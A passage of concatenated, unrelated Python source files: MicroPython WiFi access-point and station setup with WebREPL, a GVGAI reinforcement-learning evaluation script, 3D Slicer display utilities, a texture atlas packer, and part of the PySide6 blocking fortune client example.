            if self.AP_flag.value() == 0:  # reverse op == 0
                # Blink the LED to acknowledge the button press.
                for i in range(4):
                    self.led.value(not self.led.value())
                    time.sleep_ms(250)
                if self.ap.active() is False:
                    for i in range(4):
                        self.led.value(not self.led.value())
                        time.sleep_ms(250)
                    # Drive the flag pin, then re-arm it as an input so
                    # the chosen state survives the reset.
                    self.AP_flag.init(Pin.OUT)
                    time.sleep_ms(1000)
                    self.AP_flag.value(0)  # reverse op == 1
                    self.AP_flag.init(Pin.IN, Pin.PULL_UP)
                    print('Enabling AP...')
                    machine.reset()
                else:
                    self.ap.active(False)
                    self.AP_flag.init(Pin.OUT)
                    time.sleep_ms(1000)
                    self.AP_flag.value(0)  # reverse op == 1
                    self.AP_flag.init(Pin.IN, Pin.PULL_DOWN)
                    print(self.AP_flag.value())
                    print('Disabling AP...')
                    time.sleep(1)
                    machine.reset()
            self.irq_busy = False

    def ap_enable_int(self):
        """Arm the AP toggle button interrupt (falling edge)."""
        # AP Interrupt config
        self.button = Pin(self.butpin, Pin.OUT)
        self.button.init(Pin.IN, Pin.PULL_UP)
        print(self.button.value())
        self.button.irq(trigger=Pin.IRQ_FALLING, handler=self.toggle_AP_usb)

    def STA_conn(self):
        """Connect in station mode using credentials from STA_FILE,
        then start the WebREPL and blink the LED to signal success."""
        # LOAD WIFI_.CONFIG
        with open(self.STA_FILE, 'r') as wifi_file:
            wifi_config = json.load(wifi_file)
        wlan = network.WLAN(network.STA_IF)
        wlan.active(True)
        if not wlan.isconnected():
            print('connecting to network...')
            wlan.connect(wifi_config['ssid'], wifi_config['password'])
            # Busy-wait until the association completes.
            while not wlan.isconnected():
                pass
        print('Connected to {}'.format(wifi_config['ssid']))
        print('Network Config:', wlan.ifconfig())
        webrepl.start()
        for i in range(10):
            self.led.value(not self.led.value())
            time.sleep(0.2)
        self.led.value(False)

    def AP_conn(self):
        """Bring up the access point using credentials from AP_FILE,
        then start the WebREPL and blink the LED to signal success."""
        with open(self.AP_FILE, 'r') as ap_file:
            ap_config = json.load(ap_file)  # be aware load upy, loads py
        self.ap.active(True)
        self.ap.config(essid=ap_config['ssid'],
                       authmode=network.AUTH_WPA_WPA2_PSK,
                       password=ap_config['password'])
        print('Acces point configurated: {}'.format(ap_config['ssid']))
        print(self.ap.ifconfig())
        webrepl.start()
        for i in range(10):
            self.led.value(not self.led.value())
            time.sleep(0.2)
        self.led.value(False)

    def ap_config(self, ssid, passw):
        """Persist access-point credentials to AP_FILE as JSON."""
        # Was `password=<PASSWORD>` (an anonymization placeholder and a
        # syntax error); store the passw argument instead.
        ap_conf = dict(ssid=ssid, password=passw)
        with open(self.AP_FILE, 'w') as ap_file:
            ap_file.write(json.dumps(ap_conf))
        if not self.silent:
            print('AP: {} configurated'.format(ssid))

    def sta_config(self, ssid, passw):
        """Persist station (default WLAN) credentials to STA_FILE as JSON."""
        # Same `<PASSWORD>` placeholder fix as ap_config.
        sta_conf = dict(ssid=ssid, password=passw)
        with open(self.STA_FILE, 'w') as sta_file:
            sta_file.write(json.dumps(sta_conf))
        if not self.silent:
            print('DEFAULT WLAN: {} configurated'.format(ssid))
|
<reponame>yooceii/HardRLWithYoutube
import tensorflow as tf
import argparse
from level_selector import *
from model import Model
from runner import Runner
from env import *
from baselines.a2c.utils import make_path
from baselines.a2c.policies import CnnPolicy
from baselines.common import set_global_seeds
from baselines.ppo2.policies import CnnPolicy, LstmPolicy, LnLstmPolicy
def eval(model, env, nsteps=5, runs=100, render=False, level_selector=None):
    """Run the model in env until at least `runs` episodes finish and
    return the first `runs` episode scores.

    NOTE: shadows the built-in ``eval``; the name is kept for caller
    compatibility.  ``level_selector`` is accepted but unused here,
    also kept for compatibility.
    """
    runner = Runner(env, model, nsteps=nsteps, gamma=0, render=render)
    # Keep stepping until enough episodes have completed; step results
    # are not needed, only the accumulated final rewards.  (The unused
    # unpacking and the unused mean/std locals were removed.)
    while len(runner.final_rewards) < runs:
        runner.run()
    return runner.final_rewards[:runs]
def test_on(game, level, selector, experiment_name, experiment_id, policy, num_envs=1, seed=0, runs=1000, render=False):
    """Evaluate the most recently saved model of an experiment on one
    GVGAI level (or with a level selector) and close the environment.

    Loads the checkpoint with the highest step count from
    ./results/<experiment_name>/models/<experiment_id>/ and runs
    `runs` evaluation episodes via eval().
    """
    # Environment name
    env_id = "gvgai-" + game + "-lvl" + str(level) + "-v0"
    # Test name
    test_name = game
    if selector is not None:
        test_name += "-ls-" + selector
    else:
        test_name += "-lvl-" + str(level)
    print("Test name: " + test_name)
    print('Training name: ' + experiment_name)
    print("Training id: " + experiment_id)
    # Level selector
    # NOTE(review): `level_path` is not defined in this module --
    # presumably provided by one of the star imports; verify.
    level_selector = LevelSelector.get_selector(selector, game, level_path)
    env = make_gvgai_env(env_id, num_envs, seed, level_selector=level_selector)
    # Main plots per experiment
    mean_scores = []
    std_scores = []
    model_folder = './results/' + experiment_name + '/models/' + experiment_id + "/"
    # Find number of steps for last model
    # NOTE(review): `glob` is not imported here -- presumably provided
    # by a star import; confirm.
    steps = -1
    for model_meta_name in glob.iglob(model_folder + '*.meta'):
        # Checkpoint files look like '.../<name>-<steps>.meta'.
        s = int(model_meta_name.split('.meta')[0].split('/')[-1].split("-")[1])
        if s > steps:
            steps = s
    if policy == 'cnn':
        policy_fn = CnnPolicy
    elif policy == 'lstm':
        policy_fn = LstmPolicy
    elif policy == 'lnlstm':
        policy_fn = LnLstmPolicy
    tf.reset_default_graph()
    ob_space = env.observation_space
    ac_space = env.action_space
    model = Model(policy=policy_fn, ob_space=ob_space, ac_space=ac_space, nenvs=num_envs, nsteps=5)
    try:
        model.load(model_folder, steps)
    except Exception as e:
        # Loading can fail when no checkpoint exists; report and bail out.
        print(e)
        env.close()
        return
    eval(model, env, runs=runs, render=render, level_selector=level_selector)
    env.close()
def main():
    """Parse command-line options and launch the evaluation."""
    arg_parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    arg_parser.add_argument('--policy', help='Policy architecture',
                            choices=['cnn', 'lstm', 'lnlstm'], default='cnn')
    arg_parser.add_argument('--runs', help='Number of runs for each model',
                            type=int, default=100)
    arg_parser.add_argument('--num-envs',
                            help='Number of environments/workers to run in parallel',
                            type=int, default=10)
    arg_parser.add_argument('--game', help='Game name (default=zelda)',
                            default='zelda')
    arg_parser.add_argument('--seed', help='RNG seed', type=int, default=0)
    arg_parser.add_argument('--experiment-name',
                            help='Name of the experiment to evaluate, e.g. zelda-ls-pcg-random (default=None -> all)',
                            default=None)
    arg_parser.add_argument('--experiment-id',
                            help='Id of the experiment to evaluate')
    arg_parser.add_argument('--level', help='Level (integer) to train on',
                            type=int, default=0)
    arg_parser.add_argument('--selector',
                            help='Level selector to use in training - will ignore the level argument if set (default: None)',
                            choices=[None] + LevelSelector.available, default=None)
    arg_parser.add_argument('--render', action='store_true',
                            help='Render screen (default: False)')
    args = arg_parser.parse_args()
    test_on(args.game, args.level, args.selector,
            experiment_name=args.experiment_name,
            experiment_id=args.experiment_id,
            policy=args.policy, runs=args.runs, seed=args.seed,
            num_envs=args.num_envs, render=args.render)
# Run the evaluation when executed as a script.
if __name__ == '__main__':
    main()
|
<filename>SlicerPlayground/playground_utils.py
"""
Utility functions for Slicer Playground.
These functions are copies from notebooks where they were created to enable reuse.
"""
import numpy as np
import vtk
import slicer
from emoji import UNICODE_EMOJI
def create_np_text_img(text: str, size: tuple = (128, 128),
                       font_size: int = 24, emoj_size: int = 64) -> np.ndarray:
    """
    Render text on a black background and return it as a numpy array.

    The result has shape ``(*size, 1)``.  Emoji input selects the Apple
    color-emoji font; everything else uses Arial Black.  The hard-coded
    font paths are macOS-specific -- adjust them on other systems.

    :param text: Input unicode text.
    :type text: str
    :param size: Target image size (optional).
    :type size: tuple
    :param font_size: Font size for plain text (optional).
    :type font_size: int
    :param emoj_size: Font size for emoji text (optional).
    :type emoj_size: int
    :returns: Flat 3D numpy array containing pixel values.
    :rtype: np.ndarray
    """
    from PIL import Image, ImageDraw, ImageFont

    contains_emoji = bool(set(text) & set(UNICODE_EMOJI))
    if contains_emoji:
        font = ImageFont.truetype(
            "/System/Library/Fonts/Apple Color Emoji.ttc", emoj_size)
    else:
        font = ImageFont.truetype(
            "/System/Library/Fonts/Microsoft/Arial Black.ttf", font_size)
    text_width, text_height = font.getsize(text)
    canvas = Image.new('I', size, "black")
    ImageDraw.Draw(canvas).text(
        (text_width / 2, text_height / 2), text, 'white', font)
    return np.asarray(canvas).reshape(*size, 1)
def show_slice_in_slice_view(volumeNode: slicer.vtkMRMLScalarVolumeNode,
                             sliceNum: int = 0,
                             sliceView: str = 'Red'):
    """
    Show a volume in one of the default slice views.

    :param volumeNode: The volume node to display.
    :type volumeNode: vtkMRMLScalarVolumeNode
    :param sliceNum: Slice offset to show. Optional. Defaults to 0.
    :type sliceNum: int
    :param sliceView: One of default slice views ('Red', 'Green', 'Yellow')
    :type sliceView: str
    """
    sliceViewWidget = slicer.app.layoutManager().sliceWidget(sliceView)
    sliceWidgetLogic = sliceViewWidget.sliceLogic()
    sliceWidgetLogic.GetSliceCompositeNode().SetBackgroundVolumeID(volumeNode.GetID())
    sliceWidgetLogic.FitSliceToAll()
    sliceWidgetLogic.SetSliceOffset(sliceNum)
    # (removed a dead trailing `pass` statement)
def fit_slice_view(sliceView: str = 'all'):
    """
    Fit slice field of view to data.

    :param sliceView: Either one of default slice views
        ['Red', 'Yellow', 'Green'] or 'all'.
    :type sliceView: str
    :raises ValueError: If sliceView is neither a known view name nor 'all'.
    """
    if sliceView == 'all':
        sliceView = slicer.app.layoutManager().sliceViewNames()
    elif sliceView in ['Red', 'Yellow', 'Green']:
        sliceView = [sliceView]
    else:
        # Previously an unknown name fell through and the string was
        # iterated character by character; fail fast instead.
        raise ValueError('Unknown slice view: {}'.format(sliceView))
    for sv in sliceView:
        sliceViewWidget = slicer.app.layoutManager().sliceWidget(sv)
        sliceWidgetLogic = sliceViewWidget.sliceLogic()
        sliceWidgetLogic.FitSliceToAll()
    # (removed a dead trailing `pass` statement)
def log_image_info(volume: slicer.vtkMRMLScalarVolumeNode):
    """Print the volume's name, origin, spacing and dimensions to the console."""
    info = (
        f'Volume name: {volume.GetName()}',
        f'Origin: {volume.GetOrigin()}',
        f'Spacing: {volume.GetSpacing()}',
        f'Dimensions: {volume.GetImageData().GetDimensions()}\n',
    )
    print('\n'.join(info))
def layout_3_volumes(volumeList: list):
    """Prepare 3x3 layout with 3 volumes in slice views.

    Each of the first three names in volumeList is shown in one row of
    slice views, with Axial/Sagittal/Coronal orientation per column.
    NOTE(review): assumes a 3x3 slice layout is already active so the
    named views 'Slice4'..'Slice9' exist -- confirm with callers.
    """
    ORIENTATIONS = ["Axial", "Sagittal", "Coronal"]
    THREE_BY_THREE_SLICES = [['Red', 'Yellow', 'Green'],
                             ['Slice4', 'Slice5', 'Slice6'],
                             ['Slice7', 'Slice8', 'Slice9']]
    for volumeIndex in range(3):
        # Look the volume up by name in the MRML scene.
        inputVolumeNode = slicer.mrmlScene.GetFirstNodeByName(volumeList[volumeIndex])
        for view in THREE_BY_THREE_SLICES[volumeIndex]:
            show_slice_in_slice_view(volumeNode=inputVolumeNode,
                                     sliceView=view)
            # Orientation is chosen by the view's column position in the row.
            sliceWidgetNode = slicer.app.layoutManager().sliceWidget(view).mrmlSliceNode()
            sliceWidgetNode.SetOrientation(ORIENTATIONS[THREE_BY_THREE_SLICES[volumeIndex].index(view)])
def create_seed_geometry(seedPositions: list, seedSize: int) -> vtk.vtkPolyData:
    """
    Create sphere geometry at each given position.

    :param seedPositions: A list of lists of seed coordinates [r, a, s]
    :type seedPositions: list
    :param seedSize: The sphere radius (passed to SetRadius)
    :type seedSize: int
    :returns: An updated vtkAppendPolyData filter whose output combines
        one sphere per seed position
    :rtype: vtkAppendPolyData
    """
    combined = vtk.vtkAppendPolyData()
    for center in seedPositions:
        sphere = vtk.vtkSphereSource()
        sphere.SetCenter(center)
        sphere.SetRadius(seedSize)
        sphere.Update()
        combined.AddInputData(sphere.GetOutput())
    combined.Update()
    return combined
def rotate_x(geometry: vtk.vtkPolyData,
             angle: int,
             centerPoint: list) -> vtk.vtkTransformPolyDataFilter:
    """
    Rotate geometry around the X axis through a given center point.

    NOTE: despite the annotation, ``geometry`` must be a vtk algorithm
    (``GetOutputPort`` is called on it), e.g. the filter returned by
    create_seed_geometry.

    :param geometry: Upstream vtk algorithm producing the polydata
    :param angle: The angle (degrees)
    :type angle: int
    :param centerPoint: Coordinates of the PolyData center
    :type centerPoint: list
    :returns: A vtk filter that has the rotated data as output.
    :rtype: vtkTransformPolyDataFilter
    """
    xform = vtk.vtkTransform()
    # Translate to the rotation center, rotate, translate back, so the
    # rotation happens around centerPoint rather than the origin.
    xform.Translate(*centerPoint)
    xform.RotateX(angle)
    xform.Translate(-centerPoint[0], -centerPoint[1], -centerPoint[2])
    result = vtk.vtkTransformPolyDataFilter()
    result.SetTransform(xform)
    result.SetInputConnection(geometry.GetOutputPort())
    result.Update()
    return result
|
<reponame>mborgerson/textureatlas<filename>textureatlas.py
#!/usr/bin/env python
#
# Copyright (c) 2014 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""Texture Atlas and Map File Generation Utility Classes"""
DESCRIPTION = """Packs many smaller images into one larger image, a Texture
Atlas. A companion file (.map), is created that defines where each texture is
mapped in the atlas."""
import PIL.Image as Image
import argparse
import os.path
import re
import shlex
import struct
class Packable(object):
    """A two-dimensional item with a mutable position and a fixed size."""

    def __init__(self, width, height):
        self._x, self._y = 0, 0
        self._width, self._height = width, height

    @property
    def x(self):
        return self._x

    @x.setter
    def x(self, value):
        self._x = value

    @property
    def y(self):
        return self._y

    @y.setter
    def y(self, value):
        self._y = value

    @property
    def width(self):
        return self._width

    @property
    def height(self):
        return self._height

    @property
    def perimeter(self):
        """Sum of all four side lengths."""
        return 2 * (self._width + self._height)
class PackRegion(object):
    """A rectangular region into which 2D Packable objects are packed.

    Packing an item splits the remaining space into two sub-regions
    (below and to the right of the item); later items recurse into
    those sub-regions (guillotine-style packing).
    """

    def __init__(self, x, y, width, height):
        """Create an empty region at (x, y) with the given size."""
        self._x = x
        self._y = y
        self._width = width
        self._height = height
        self._sub1 = None
        self._sub2 = None
        self._packable = None

    @property
    def x(self):
        return self._x

    @property
    def y(self):
        return self._y

    @property
    def width(self):
        return self._width

    @property
    def height(self):
        return self._height

    @property
    def packable(self):
        return self._packable

    def get_all_packables(self):
        """Returns a list of all Packables in this region and sub-regions."""
        if not self._packable:
            return []
        return ([self._packable]
                + self._sub1.get_all_packables()
                + self._sub2.get_all_packables())

    def pack(self, packable):
        """Pack a 2D packable into this region; returns True on success."""
        if self._packable:
            # Already occupied: try the sub-regions instead.
            return self._sub1.pack(packable) or self._sub2.pack(packable)
        if (packable.width > self._width) or \
           (packable.height > self._height):
            # No room for this item here.
            return False
        self._packable = packable
        # Anchor the item at this region's top-left corner.
        self._packable.x = self._x
        self._packable.y = self._y
        # Split the leftover space: sub1 below the item, sub2 to its right.
        self._sub1 = PackRegion(self._x,
                                self._y + self._packable.height,
                                self._packable.width,
                                self._height - self._packable.height)
        self._sub2 = PackRegion(self._x + self._packable.width,
                                self._y,
                                self._width - self._packable.width,
                                self._height)
        return True
class Frame(Packable):
    """A single image file that can be packed into a PackRegion."""

    def __init__(self, filename):
        """Open the image just long enough to read its dimensions."""
        self._filename = filename
        image = Image.open(filename)
        width, height = image.size
        del image
        super(Frame, self).__init__(width, height)

    @property
    def filename(self):
        return self._filename

    def draw(self, image):
        """Paste this frame's image into another Image at (x, y)."""
        src = Image.open(self._filename)
        image.paste(src, (self.x, self.y))
        del src
class Texture(object):
    """A named collection of one or more frames."""

    def __init__(self, name, frames):
        """Store the texture name and its frame list."""
        self._name = name
        self._frames = frames

    @property
    def name(self):
        """The texture's name."""
        return self._name

    @property
    def frames(self):
        """The texture's frames, in order."""
        return self._frames
class TextureAtlas(PackRegion):
    """Texture Atlas generator: packs Textures' frames into one image."""

    def __init__(self, width, height):
        """Create an empty atlas region of the given size."""
        super(TextureAtlas, self).__init__(0, 0, width, height)
        self._textures = []

    @property
    def textures(self):
        return self._textures

    def pack(self, texture):
        """Pack every frame of a Texture into this atlas."""
        self._textures.append(texture)
        for frame in texture.frames:
            if not super(TextureAtlas, self).pack(frame):
                raise Exception('Failed to pack frame %s' % frame.filename)

    def write(self, filename, mode):
        """Render all packed frames and save the final atlas image."""
        atlas_image = Image.new(mode, (self.width, self.height))
        for texture in self._textures:
            for frame in texture.frames:
                frame.draw(atlas_image)
        atlas_image.save(filename)
class TextureAtlasMap(object):
    """Base class for Texture Atlas Map file generators."""

    def __init__(self, atlas):
        """Remember the atlas to be described by the map file."""
        self._atlas = atlas

    def write(self, fd):
        """Writes the texture atlas map file into file object fd."""
        raise Exception('Not Implemented')
class BinaryTextureAtlasMap(TextureAtlasMap):
    """Binary Texture Atlas Map file generator.
    The binary atlas map is composed of four sections. The first section is the
    header. The second section contains the details of each texture (name,
    number of frames, etc.). The third section contains all null-terminated
    strings referenced by other sections. The fourth section contains the
    coordinates and dimensions of all texture frames.
    HEADER FORMAT
    Offset  Size  Description
    ------  ----  -----------
         0     4  Magic ('TEXA' = 0x41584554)
         4     4  Texture Atlas Width
         8     4  Texture Atlas Height
        12     4  Number of Textures
        16     4  Texture Section Offset
        20     4  Texture Section Size
        24     4  String Section Offset
        28     4  String Section Size
        32     4  Frame Section Offset
        36     4  Frame Section Size
    TEXTURE FORMAT
    Offset  Size  Description
    ------  ----  -----------
         0     4  Offset to Texture Name in String Section
         4     4  Number of Frames
         8     4  Offset to first Frame
    FRAME FORMAT
    Offset  Size  Description
    ------  ----  -----------
         0     4  X-Coordinate of Frame
         4     4  Y-Coordinate of Frame
         8     4  Frame Width
        12     4  Frame Height
    """

    def __init__(self, atlas):
        super(BinaryTextureAtlasMap, self).__init__(atlas)

    def write(self, fd):
        """Writes the binary texture atlas map file into file object fd.

        NOTE(review): writes str objects to fd, which assumes Python 2
        (str == bytes); under Python 3 a binary fd would need b'TEXA'
        and encoded names -- confirm the target interpreter.
        """
        # Calculate offset and size of each section
        hdr_fmt = 'IIIIIIIII'
        hdr_fmt_len = struct.calcsize(hdr_fmt)
        hdr_section_len = hdr_fmt_len+4  # Header + Magic
        tex_fmt = 'III'
        tex_fmt_len = struct.calcsize(tex_fmt)
        tex_section_off = hdr_section_len
        tex_section_len = len(self._atlas.textures)*tex_fmt_len
        str_section_off = tex_section_off+tex_section_len
        # Each name is stored null-terminated, hence the +1 per texture.
        str_section_len = sum(map(lambda t:len(t.name)+1, self._atlas.textures))
        frm_fmt = 'IIII'
        frm_fmt_len = struct.calcsize(frm_fmt)
        frm_section_off = str_section_off + str_section_len
        frm_section_len = sum(map(lambda t:len(t.frames), self._atlas.textures))
        frm_section_len *= frm_fmt_len
        # Write Header (magic first, then the nine 32-bit header fields)
        fd.write('TEXA')
        fd.write(struct.pack(hdr_fmt, self._atlas.width,
                             self._atlas.height,
                             len(self._atlas.textures),
                             tex_section_off, tex_section_len,
                             str_section_off, str_section_len,
                             frm_section_off, frm_section_len))
        # Write Texture Section (offsets are relative to their sections)
        str_offset = 0
        frm_offset = 0
        for t in self._atlas.textures:
            fd.write(struct.pack(tex_fmt, str_offset,
                                 len(t.frames),
                                 frm_offset))
            str_offset += len(t.name)+1  # +1 for sentinel byte
            frm_offset += len(t.frames)*frm_fmt_len
        # Write String Section (null-terminated names, same order)
        for t in self._atlas.textures:
            fd.write(t.name + '\x00')
        # Write Frame Section (x, y, width, height per frame)
        for t in self._atlas.textures:
            for f in t.frames:
                fd.write(struct.pack(frm_fmt, f.x,
                                     f.y,
                                     f.width,
                                     f.height))
def main():
    """Command-line entry point: pack textures into an atlas + map file."""
    # Parse arguments
    arg_parser = argparse.ArgumentParser(description=DESCRIPTION,
        formatter_class=argparse.RawDescriptionHelpFormatter)
    arg_parser.add_argument('-o',
        dest='outfile',
        metavar='output-file',
        type=str,
        default='atlas.png',
        help='output filename (atlas.png)')
    arg_parser.add_argument('-m', '--mode',
        metavar='mode',
        type=str,
        default='RGBA',
        help='output file mode (RGBA)')
    arg_parser.add_argument('-s', '--size',
        metavar='size',
        type=int,
        default=512,
        help='size of atlas (n x n)')
    arg_parser.add_argument('textures',
        metavar='texture',
        type=str,
        nargs='+',
        help='filename of texture')
    args = arg_parser.parse_args()
    filename, ext = os.path.splitext(args.outfile)
    if ext == '':
        # Parenthesized (was a py2-only print statement); works on both 2 and 3.
        print('Error: Specify an image extension for outfile (e.g. atlas.png).')
        exit(1)
    # Parse texture names
    textures = []
    for texture in args.textures:
        # Look for an optional "name=" prefix before the frame list
        # (raw string avoids the invalid-escape warning for \w).
        matches = re.match(r'^((\w+)=)?(.+)', texture)
        name, frames = matches.group(2), shlex.split(matches.group(3))
        # If no name was specified, use the first frame's filename
        name = name or os.path.splitext(os.path.basename(frames[0]))[0]
        # Build frame objects
        frames = [Frame(f) for f in frames]
        # Add frames to texture object list
        textures.append(Texture(name, frames))
    # Sort textures by perimeter size in non-increasing order so larger
    # items are placed first (better packing)
    textures = sorted(textures, key=lambda i: i.frames[0].perimeter, reverse=True)
    # Create the atlas and pack textures in
    atlas = TextureAtlas(args.size, args.size)
    for texture in textures:
        atlas.pack(texture)
    # Write atlas and map file (with-block closes the map file even on error;
    # the original leaked the handle if write() raised)
    atlas.write(args.outfile, args.mode)
    with open(filename + '.map', 'wb') as f:
        BinaryTextureAtlasMap(atlas).write(f)


if __name__ == '__main__':
    main()
#############################################################################
##
## Copyright (C) 2013 Riverbank Computing Limited.
## Copyright (C) 2016 The Qt Company Ltd.
## Contact: http://www.qt.io/licensing/
##
## This file is part of the Qt for Python examples of the Qt Toolkit.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of The Qt Company Ltd nor the names of its
## contributors may be used to endorse or promote products derived
## from this software without specific prior written permission.
##
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
## $QT_END_LICENSE$
##
#############################################################################
"""PySide6 port of the network/blockingfortuneclient example from Qt v5.x, originating from PyQt"""
from PySide6.QtCore import (Signal, QDataStream, QMutex, QMutexLocker,
QThread, QWaitCondition)
from PySide6.QtGui import QIntValidator
from PySide6.QtWidgets import (QApplication, QDialogButtonBox, QGridLayout,
QLabel, QLineEdit, QMessageBox, QPushButton, QWidget)
from PySide6.QtNetwork import (QAbstractSocket, QHostAddress, QNetworkInterface,
QTcpSocket)
class FortuneThread(QThread):
    """Worker thread that fetches fortunes with blocking socket calls."""

    # Emitted with the fortune text on success.
    new_fortune = Signal(str)
    # Emitted with (socket error code, error message) on failure.
    error = Signal(int, str)

    def __init__(self, parent=None):
        super().__init__(parent)
        # Set to True to make run() leave its loop on the next wake-up.
        self.quit = False
        self._host_name = ''
        # cond/mutex guard _host_name and port shared with the GUI thread.
        self.cond = QWaitCondition()
        self.mutex = QMutex()
        self.port = 0

    def __del__(self):
        # Ask the worker loop to stop, wake it, and wait for termination.
        self.mutex.lock()
        self.quit = True
        self.cond.wakeOne()
        self.mutex.unlock()
        self.wait()

    def request_new_fortune(self, hostname, port):
        # Called from the GUI thread: publish the target and either start
        # the worker or wake it from its wait.
        locker = QMutexLocker(self.mutex)
        self._host_name = hostname
        self.port = port
        if not self.isRunning():
            self.start()
        else:
            self.cond.wakeOne()

    def run(self):
        # Snapshot the connection target under the lock.
        self.mutex.lock()
        server_name = self._host_name
        server_port = self.port
        self.mutex.unlock()
        while not self.quit:
            timeout = 5 * 1000
            socket = QTcpSocket()
            socket.connectToHost(server_name, server_port)
            if not socket.waitForConnected(timeout):
                self.error.emit(socket.error(), socket.errorString())
                return
            # The server first sends a 16-bit block size, then the payload.
            while socket.bytesAvailable() < 2:
                if not socket.waitForReadyRead(timeout):
                    self.error.emit(socket.error(), socket.errorString())
                    return
            instr = QDataStream(socket)
            instr.setVersion(QDataStream.Qt_4_0)
            block_size = instr.readUInt16()
            # Block until the whole fortune string has arrived.
            while socket.bytesAvailable() < block_size:
                if not socket.waitForReadyRead(timeout):
                    self.error.emit(socket.error(), socket.errorString())
                    return
            # Emit the result, then sleep until the next request updates
            # the target (cond.wait atomically releases/reacquires mutex).
            self.mutex.lock()
            fortune = instr.readQString()
            self.new_fortune.emit(fortune)
            self.cond.wait(self.mutex)
            server_name = self._host_name
            server_port = self.port
            self.mutex.unlock()
class BlockingClient(QWidget):
    """GUI for the blocking fortune client: host/port inputs, a status
    label, and a button that asks FortuneThread for a new fortune."""

    def __init__(self, parent=None):
        super().__init__(parent)
        self.thread = FortuneThread()
        self._current_fortune = ''
        host_label = QLabel("&Server name:")
        port_label = QLabel("S&erver port:")
        # Pick the first non-localhost IPv4 address as the default host;
        # fall back to 127.0.0.1 when none is found.
        for ip_address in QNetworkInterface.allAddresses():
            if ip_address != QHostAddress.LocalHost and ip_address.toIPv4Address() != 0:
                break
        else:
            ip_address = QHostAddress(QHostAddress.LocalHost)
        ip_address = ip_address.toString()
        self._host_line_edit = QLineEdit(ip_address)
        self._port_line_edit = QLineEdit()
        # Restrict the port field to valid TCP port numbers.
        self._port_line_edit.setValidator(QIntValidator(1, 65535, self))
        host_label.setBuddy(self._host_line_edit)
        port_label.setBuddy(self._port_line_edit)
        self._status_label = QLabel(
            "This example requires that you run the Fortune Server example as well.")
        self._status_label.setWordWrap(True)
        self._get_fortune_button = QPushButton("Get Fortune")
        self._get_fortune_button.setDefault(True)
        # Disabled until both host and port are filled in.
        self._get_fortune_button.setEnabled(False)
        quit_button = QPushButton("Quit")
        button_box = QDialogButtonBox()
        button_box.addButton(self._get_fortune_button, QDialogButtonBox.ActionRole)
        button_box.addButton(quit_button, QDialogButtonBox.RejectRole)
        # Wire up signals: button clicks, input validation, thread results.
        self._get_fortune_button.clicked.connect(self.request_new_fortune)
        quit_button.clicked.connect(self.close)
        self._host_line_edit.textChanged.connect(self.enable_get_fortune_button)
        self._port_line_edit.textChanged.connect(self.enable_get_fortune_button)
        self.thread.new_fortune.connect(self.show_fortune)
        self.thread.error.connect(self.display_error)
        main_layout = QGridLayout()
        main_layout.addWidget(host_label, 0, 0)
        main_layout.addWidget(self._host_line_edit, 0, 1)
        main_layout.addWidget(port_label, 1, 0)
        main_layout.addWidget(self._port_line_edit, 1, 1)
        main_layout.addWidget(self._status_label, 2, 0, 1, 2)
        main_layout.addWidget(button_box, 3, 0, 1, 2)
        self.setLayout(main_layout)
        self.setWindowTitle("Blocking Fortune Client")
        self._port_line_edit.setFocus()

    def request_new_fortune(self):
        # Disable the button until a fortune (or an error) arrives.
        self._get_fortune_button.setEnabled(False)
        self.thread.request_new_fortune(self._host_line_edit.text(),
                                        int(self._port_line_edit.text()))

    def show_fortune(self, nextFortune):
        # If the server repeated itself, immediately ask again.
        if nextFortune == self._current_fortune:
            self.request_new_fortune()
            return
        self._current_fortune = nextFortune
        self._status_label.setText(self._current_fortune)
        self._get_fortune_button.setEnabled(True)

    def display_error(self, socketError, message):
        # Map common socket errors to friendly dialogs.
        if socketError == QAbstractSocket.HostNotFoundError:
            QMessageBox.information(self, "Blocking Fortune Client",
                "The host was not found. Please check the host and port "
                "settings.")
        elif socketError == QAbstractSocket.ConnectionRefusedError:
            QMessageBox.information(self, "Blocking Fortune Client",
                "The connection was refused by the peer. Make sure the "
                "fortune server is running, and check that the host name "
                "and port settings are correct.")
        else:
